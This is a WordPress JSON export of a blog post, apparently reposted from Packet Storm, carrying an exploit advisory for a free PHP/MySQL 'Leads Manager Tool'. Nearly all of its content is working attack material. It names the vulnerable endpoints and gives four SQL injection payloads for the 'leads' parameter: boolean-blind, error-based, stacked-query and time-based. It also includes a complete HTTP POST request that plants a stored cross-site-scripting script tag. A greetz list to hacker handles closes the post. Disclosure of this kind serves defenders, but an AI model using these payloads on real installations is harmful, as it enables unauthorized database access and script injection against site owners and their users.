{"id":58597,"date":"2024-08-02T19:40:38","date_gmt":"2024-08-02T16:40:38","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/179888\/leadsmt-sqlxss.txt"},"modified":"2024-08-02T19:40:38","modified_gmt":"2024-08-02T16:40:38","slug":"leads-manager-tool-sql-injection-cross-site-scripting","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/leads-manager-tool-sql-injection-cross-site-scripting\/","title":{"rendered":"Leads Manager Tool SQL Injection \/ Cross Site Scripting"},"content":{"rendered":"[x]========================================================================================================================================[x]| Title : Leads Manager Tool SQL &amp; XSS[stored)] Vulnerabilities<br \/>| Software : Leads Manager Tool Using PHP and MySQL with Source Code<br \/>| Create By : https:\/\/www.sourcecodester.com\/users\/remyandrade<br \/>| First Release: 25\/01\/22<br \/>| Download : https:\/\/www.sourcecodester.com\/php\/17510\/leads-manager-tool-using-php-and-mysql-source-code.html<br \/>| Date : 30 Agustus 2024<br \/>| Author : OoN_Boy<br \/>[x]========================================================================================================================================[x]| Technology : PHP<br \/>| Database : MySQL<br \/>| Price : FREE<br \/>| Description : Leads Manager Tool, a comprehensive web application designed to streamline the process of managing business leads. Built with the power of PHP and MySQL, this tool offers a seamless and user-friendly experience for storing, updating, and organizing lead information<br \/>[x]========================================================================================================================================[x]\n[O] Exploit<\/p>\n<p>http:\/\/localhost\/leads-manager-tool\/endpoint\/delete-leads.php?leads=[SQL]http:\/\/localhost\/leads-manager-tool\/endpoint\/add-leads.php<\/p>\n[O] Proof of concept<\/p>\n[SQL]Parameter: leads (GET) <br \/>Type: boolean-based blind<br \/>Title: MySQL RLIKE boolean-based blind &#8211; WHERE, HAVING, ORDER BY or GROUP BY clause<br \/>Payload: leads= &#8211;emurate&#8217; RLIKE (SELECT (CASE WHEN (8305=8305) THEN 0x202d2d656d7572617465 ELSE 0x28 END))&#8211; rUwl<\/p>\n<p>Type: error-based<br \/>Title: MySQL &gt;= 5.0 OR error-based &#8211; WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br \/>Payload: leads= &#8211;emurate&#8217; OR (SELECT 1382 FROM(SELECT COUNT(*),CONCAT(0x7162787171,(SELECT (ELT(1382=1382,1))),0x7176706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&#8211; vKls<\/p>\n<p>Type: stacked queries<br \/>Title: MySQL &gt;= 5.0.12 stacked queries (comment)<br \/>Payload: leads= &#8211;emurate&#8217;;SELECT SLEEP(5)#<\/p>\n<p>Type: time-based blind<br \/>Title: MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)<br \/>Payload: leads= &#8211;emurate&#8217; AND (SELECT 1244 FROM (SELECT(SLEEP(5)))fAev)&#8211; ZNBt<\/p>\n[XSS] <br \/>POST \/leads-manager-tool\/endpoint\/add-leads.php HTTP\/1.1<br \/>Host: 127.0.0.1<br \/>Accept-Encoding: gzip, deflate, br<br \/>Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.7<br \/>Accept-Language: en-US;q=0.9,en;q=0.8<br \/>User-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/126.0.6478.127 Safari\/537.36<br \/>Connection: close<br \/>Cache-Control: max-age=0<br \/>Origin: http:\/\/127.0.0.1<br \/>Upgrade-Insecure-Requests: 1<br \/>Referer: http:\/\/127.0.0.1\/leads-manager-tool\/<br \/>Content-Type: application\/x-www-form-urlencoded<br \/>Sec-CH-UA: &#8220;.Not\/A)Brand&#8221;;v=&#8221;99&#8243;, &#8220;Google Chrome&#8221;;v=&#8221;126&#8243;, &#8220;Chromium&#8221;;v=&#8221;126&#8243;<br \/>Sec-CH-UA-Platform: Windows<br \/>Sec-CH-UA-Mobile: ?0<br \/>Content-Length: 85<\/p>\n<p>leads_name=Vrs&lt;script&gt;alert(1)&lt;\/script&gt;Hck&amp;email_add=vrs-hck@maho.id&amp;phone_number=911-911-9111<\/p>\n[x]========================================================================================================================================[x]\n[O] Greetz<\/p>\n<p>BatamHacker, Vrs-hCk, c0li, h4ntu, Opay, Ndet, Ipay, Paman, NoGe, H312Y, dono, pizzyroot, zxvf, Joe Chawanua, k0rea [Ntc],xx_user, s3t4n, Angela Chang, IrcMafia, str0ke, em|nem, Pandoe, Ronny ^s0n g0ku^<\/p>\n[x]========================================================================================================================================[x]\n","protected":false},"excerpt":{"rendered":"<p>[x]========================================================================================================================================[x]| Title : Leads Manager Tool SQL &amp; XSS[stored)] Vulnerabilities| Software : Leads Manager Tool Using PHP and MySQL with Source Code| Create By : https:\/\/www.sourcecodester.com\/users\/remyandrade| First Release: 25\/01\/22| Download : https:\/\/www.sourcecodester.com\/php\/17510\/leads-manager-tool-using-php-and-mysql-source-code.html| Date : 30 Agustus 2024| Author : OoN_Boy[x]========================================================================================================================================[x]| Technology : PHP| Database : MySQL| Price : FREE| Description : Leads Manager Tool, a &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-58597","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/58597","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=58597"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/58597\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=58597"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=58597"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=58597"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}